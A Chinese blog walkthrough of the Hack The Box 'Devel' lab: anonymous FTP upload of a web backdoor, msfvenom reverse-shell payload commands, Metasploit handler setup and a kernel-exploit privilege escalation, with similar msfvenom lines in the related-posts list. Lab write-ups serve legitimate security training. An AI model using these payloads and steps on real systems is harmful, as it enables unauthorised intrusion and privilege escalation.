【Hack The Box】windows练习-- devel

已于 2022-10-28 22:32:29 修改
阅读量1.1k 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows microsoft 渗透测试 网络安全
于 2022-10-28 22:27:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127577104
版权

HTB 学习笔记

【Hack The Box】windows练习-- devel

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月28日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

信息收集

Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-28 08:24 EDT
Nmap scan report for 10.129.6.232
Host is up (0.67s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS7

ftp允许匿名登陆
还有一个80页面
在这里插入图片描述

ftp枚举

匿名登陆
Anonymous
在这里插入图片描述
发现有一个图片,get下载到本地之后发现
就是80页面的首页
那就试试上传,看能不能直接上传上去一个后门

后门植入

在这里插入图片描述成功上传,那接下来就生成payload

生成payload

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

这里之所以生成aspx的后门文件是因为使用了iis文件
在这里插入图片描述成功上传(这里注意,要清楚自己设置的什么端口)
在这里插入图片描述
但是可以看到我们自己做的shell完全执行不了命令,linux中常用的几个稳定反弹shell的方法都用不了了,但是我不想用msf,因为这不利于我的oscp考试,于是我试图不利用msfvenom生成payload,但是这台机器中很多语言都没有(几乎没有任何语言。而针对于windows的shell门类我还欠缺很多)太遗憾了,只能使用msf接受shell了

msf利用

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置LHOST LPORT
然后run
然后去web访问一下那个aspx文件

提权

在这里插入图片描述然后拿到shell
这里我认为完全可以上传winpeas等来枚举信息然后利用漏洞提权
但是我真的不知道有哪些脚本可以起到这个作用,我是一个windows新手
所以就简单的利用msf来提权了
这个靶场我会再做一次的
在这里插入图片描述

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed


use post/multi/recon/local_exploit_suggester
use exploit/windows/local/ms10_015_kitrap0d
然后run即可
人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
libffi-devel-3.0.5完整版本centos6
07-05
centos6所有版本的libffi-devel包集合,供各位友友参考,这个包python中用到的最多。
Hack The Box::Devel
aya3t的博客
10-10 160
Hack The Box::Devel
HackTheBox-Devel渗透测试
weixin_43111940的博客
04-15 188
端口信息 sudo nmap -sC -sV -A -p 21,80 10.10.10.5 匿名访问21端口,把里面的文件下载下来 访问80端口,是IIS7.0的 查看源码也没有什么收获 目录扫描发现了/aspnet_client 目录 gobuster dir -u http://10.10.10.5:80 -w /usr/share/wordlists/dirb/common.txt 重点来了,/aspnet_client就是ftp里发现的文件夹!(其实看到有iisstart.htm也可以猜
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
冬萍子癸水
04-09 356
用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf nmap 看到21ftp要想到进去看看,找敏感文件 匿名anonymous进入 也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。 可以看到IIS的图片。 再看80 扫描,没什么发现 打开80网页10.1...
HacktheboxDevel Walkthrough
汗的博客
12-05 357
预备知识 ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透 信息收集 nmap 探测一下开放端口和服务 nmap 10.10.10.5 结果如下 Nmap scan report for 10.10.10.5 Host is up (0.34s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap
Hack the box靶机 Devel
菜浪马废的博客
05-27 265
Web服务器[IIS支持.aspx .asp文件] 做了两个windows的 walkthrough都是教用msf提权的 难道我msf一定要用到win上么?
db4-devel和libcap-devel
11-12
在linuxpython安装过程中可能会有db4-devel和libcap-devel不能知道的问题可下载文档使用rpm -ivh libpcap-1.9.0-3.el8.x86_64.rpm libpcap-devel-1.9.0-3.el8.x86_64.rpm libdb4-4.8.30-30.el8.x86_64.rpm libdb4-...
zlib-devel-1.2.7-17.el7
07-20
zlib-devel-1.2.7-17.el7
openssl和openssl-devel的rpm
01-29
openssl-1.0.2n-2.58.1.x86_64.rpm,libopenssl1_0_0-1.0.2n-2.58.1.x86_64.rpm,libopenssl-devel-1.0.2n-2.58.1.x86_64.rpm,libopenssl-devel-64bit-1.0.2j-10.1.aarch64_ilp32.rpm
libcurl-devel 7.87.0安装包
12-28
适用于centos 7
Hackthebox :: Devel反思总结
Soul Blog
11-22 373
Hackthebox :: Devel反思总结 develhackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思 反思 对FTP服务的命令不够熟悉 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数 总结 部分FTP命令 .aspx是一个动态网络页面文件 扫描的21号FTP端口看到的信息中,Anonymous FTP login allowed代表着允许匿名登录,iisstart.htm 告知我们在msf
No.68-HackTheBox-windows-Devel-Walkthrough渗透学习
qq_34801745的博客
03-14 425
** HackTheBox-windows-Devel-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/3 靶机难度:初级(3.9/10) 靶机发布日期:2017年10月3日 靶机描述: Devel, while relatively simple, demonstrates the security risk...
2021-06-04msf结合漏扫模块suggester提权
qq_45290991的博客
06-04 642
转自月大佬的博客网站。。moonsec.com1、 windows 补丁审计工具使用 在终端下可以使用命令systeminfo 来查看系统的一些补丁信息 http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit
hack the box devel靶机
zr1213159840的博客
04-23 2424
打开靶机,开扫,能看出来开了ftp和80端口,而且ftp能匿名访问。 nmap -sV -Pn -A 10.10.10.5 访问地址能发现就是IIS的界面,本来想着下面也许会有东西,但是爆破后没东西。登录一下ftp,发现进了网站的目录,测试上传的东西后,确实是网站的目录,那么就可以上传木马了。 生成asp木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f aspx -o shell.aspx 在
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2664
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
dotnet new 命令详解
tangPHP的博客
06-15 351
dotnet new 命令用于基于指定的模板创建新项目、配置文件、解决方案。
Java新特性与性能调优
weidl001的博客
06-15 637
本文详细介绍了Java的新特性,从Java 8到Java 17的关键特性,以及性能调优的方法,包括JVM调优、性能分析工具和垃圾回收机制等。通过示例代码和表格总结,希望读者能更好地理解和应用Java的新特性和性能优化技术,从而提高开发效率和应用性能。
Guava常用操作
最新发布
dyf4281的专栏
06-15 342
则后续代码可以通过isPresent()来判断是否返回了期望的值(原本期望返回null或者返回不为null,其意义不清晰),并且可以使用get()来获得实际的返回值。Google的官方文档中说,它是用来避免使用null的,而且Google的code base中大约95%的collection中不该含有null值。Optional的最常用价值在于,例如,假设一个方法返回某一个数据类型,调用这个方法的代码来根据这个方法的返回值来做下一步的动作,监听者:监听来自被监听者的变更事件,完成动作变更。
java中集合List,Set,Queue,Map
m0_61898915的博客
06-09 1358
Java SE中的集合框架是一组用于存储和操作对象的类和接口。它提供了丰富的数据结构,可以用于解决各种问题。
zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel libffi-devel gcc make 的作用
04-24
zlib-devel:提供压缩与解压库。 bzip2-devel:提供 bzip2 的压缩与解压库。 openssl-devel:提供开发 SSL/TLS 加密与解密的库。 ncurses-devel:提供开发字符界面软件的库。 sqlite-devel:提供 SQLite 数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值